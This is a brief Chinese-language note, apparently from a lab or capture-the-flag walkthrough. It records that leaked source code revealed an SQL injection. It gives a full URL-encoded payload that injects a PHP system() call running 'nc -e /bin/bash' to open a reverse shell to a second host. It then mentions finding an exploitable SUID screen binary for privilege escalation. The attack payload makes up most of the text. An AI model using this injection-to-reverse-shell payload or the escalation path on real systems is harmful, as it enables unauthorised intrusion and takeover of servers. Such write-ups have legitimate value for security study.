源码泄露可以直接看到源码存在sql注入反弹shellpayloadhttp://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);echo%2011122;'%20order%20by%201%20desc%20%20--%20查看具有suid的命令发现screen命令存在漏洞